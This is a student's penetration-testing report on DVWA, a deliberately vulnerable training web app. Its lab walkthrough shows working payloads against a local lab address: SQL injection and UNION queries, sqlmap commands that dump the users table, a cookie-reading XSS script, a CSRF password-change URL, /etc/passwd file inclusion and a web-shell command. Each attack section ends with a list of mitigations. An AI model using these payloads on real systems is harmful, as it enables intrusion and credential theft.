Scribd
Upload
28 views13 pages

Dvwa

Uploaded by

a1r9y9a1n
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
28 views13 pages

Dvwa

Uploaded by

a1r9y9a1n
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 13

DVWA Pentesting Report

Introduction :-
Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is
damn vulnerable. Its main goals are to be an aid for security professionals to test their
skills and tools in a legal environment, help web developers better understand the
processes of securing web applications and aid teachers/students to teach/learn web
application security in a class room environment. Damn Vulnerable Web Application
(DVWA) is a RandomStorm OpenSource project. For further details about the services
and products RandomStorm offer please visit; http://www.randomstorm.com. The
DVWA project started in December 2008 and has steadily grown in popularity. It is
now used by thousands of security professionals, students and teachers world wide.
DVWA is now included in popular penetration testing Linux distributions such as
Samurai Web Testing Framework and many others.

Vulnerabilities
DVWA as the name suggests is vulnerable to the most common types of web
application vulnerabilities. DVWA incorporates most of the Open Web Application
Security Project's (OWASP) top 10 web application security risks for 2010 as
reported in the OWASP TOP 10 document.
https://owasp.org/www-pdf-archive/OWASP_Top_10_-_2010.pdf

The OWASP Top 10 Web Application Security Risks for 2010 are:
A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
A6: Security Misconfiguration
A7: Insecure Cryptographic Storage
A8: Failure to Restrict URL Access
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards

Some of the web application vulnerabilities which DVWA contains;


 Brute Force: HTTP Form Brute Force login page; used to test password brute
force tools and show the insecurity of weak passwords. 3

 Command Execution: Executes commands on the underlying operating


system.
 Cross Site Request Forgery (CSRF): Enables an ‘attacker’ to change the
applications admin password.

 File Inclusion: Allows an ‘attacker’ to include remote/local files into the web
application.

 SQL Injection: Enables an ‘attacker’ to inject SQL statements into an HTTP


form input box. DVWA includes Blind and Error based SQL injection.

 Insecure File Upload: Allows an ‘attacker’ to upload malicious files on to the


web server.

 Cross Site Scripting (XSS): An ‘attacker’ can inject their own scripts into the
web application/database. DVWA includes Reflected and Stored XSS.

 Easter eggs: Full path Disclosure, Authentication bypass and some others.
(find them!
POC-1:-

POC -2 (Brute Force)


 Here we can see that, when we intercept the session in burpsuit here we can do
brute force by using the no. of possible words list
Here we got the username -admin and password -password after login we will
Got access

POC-3(Command Execution):-

Form here we can access the directories

MITIGATIONS:-
 Utilize or require strong passwords
 Allow a limited number of login attempts
 Employ the use of CAPTCHAs
 Set time delays between attempts
 Limit failed login attempts

POC-4 Cross Site Request Forgery (CSRF)


.

http://192.168.234.134/dvwa/vulnerabilities/csrf/?
password_new=yuvi&password_conf=yuvi&Change=Change
After pasting the url in browser then the password will be changed
MITIGATION:-
 Token Synchronization
 Double-Submitting Cookies
 Same-Site Cookies
 Enabling User Interaction
 Custom Headers for Requests
 CSRF Mitigation with Bright Security

POC-5 File Inclusion:- go to file inclusion

Now change the url as “/etc/passwd”


MITIGATION
 ID assignation – save your file paths in a secure database and give an ID for
every single one, this way users only get to see their ID without viewing or
altering the path
 Whitelisting – use verified and secured whitelist files and ignore everything
else
 Use databases – don’t include files on a web server that can be compromised,
use a database instead
 Better server instructions – make the server send download headers
automatically instead of executing files in a specified directory
POC-6 SQL Injection :-
 In this vulnerability we can see that if we run any SQL query then it will going
to show us the critical information about system
 On running the ‘OR’’=’ this query this will show us the following information

 Now after running the following query ' or 1=2 union select user, password
from users# we will get the list of password hash to which we can easily de-
hash to know the password
MITIGATION
 Filter database inputs
 Restrict database code
 Restrict database access
 Maintain applications and databases
 Monitor application and database inputs and communications

POC-7 Blind SQL Injection:-


After typing “1” in blind sql injection we will get the session in the burpsuite
from here we get the url and cookies related info so we will run the sqlmap in kali
By using
sqlmap -u "http://192.168.234.134/dvwa/vulnerabilities/sqli_blind/?
id=1&Submit=Submit" --cookie="security=low;
PHPSESSID=63716ffe56fb72a5741e454e725bceca" --dbs
now we get the following info about the databases
Now we get the hashes and password fpr it
sqlmap -u "http://192.168.234.134/dvwa/vulnerabilities/sqli_blind/?
id=1&Submit=Submit" --cookie="security=low;
PHPSESSID=63716ffe56fb72a5741e454e725bceca" -D dvwa -T users -C
user,password --dump

MITIGATION
 Use parameterized queries to ensure that user input cannot interfere with the
structure of the intended SQL query.
 Use secure coding practices, independent of the language.
 Avoid dynamic SQL at all costs.
 Filter inputs, restrict database code, restrict database access, maintain, and monitor
the application and database.
 Stop writing dynamic queries with string concatenation.

POC-8 Reflected XSS


In this when we type any normal name then it will get pop-up
but we run any script then it will show error
<script>alert(“you are hacker”)</script>

 Then after running this script we will get the session id that can be used for
session hijakcing
<script>alert(document.cookie)</script>

IMPACT:- Reflected Cross Site Scripting is relatively complex to exploit as the


malicious payload has to be send as a part of URL and user should be tricked to visit
that URL. How ever, it has the same impact as that of a persistent XSS. In DVWA
application, XSS can be used to hijack victim's session and thereby gaining complete
access to his/her user account. Additionally, it can be used to redirect victim to a
malicious website which may contain browser exploits or a phishing page.
MITIGATIONS:-
 Use browser technologies that do not allow client-side scripting in input fields
or URLs.
 Use strict type character and encoding enforcement to avoid XSS.
 Make sure that all the user-supplied inputs are adequately validated before
sending them to the server.
 Use online tools like HTMLSanitizer to sanitize HTML code online for XSS
vulnerabilities.
 Use a web application firewall (WAF) to block abnormal server requests
POC-9 FILE UPLOAD VULNERABILITY :-
In this vulnerability when we upload any file then after uploading that file it will show
the path of the file which is not secure.

Copy this path and paste into the url we will get a new path

After browsing the link we will get the following link

The above path from .php?cmd=cat+/etc/passwd we will get the password file
MITIGATION

 Allow only certain file extensions


 Set maximum file size and name length
 Allow only authorized users
 Make sure the fetched file from the web is an expected one
 Keep your website updated

You might also like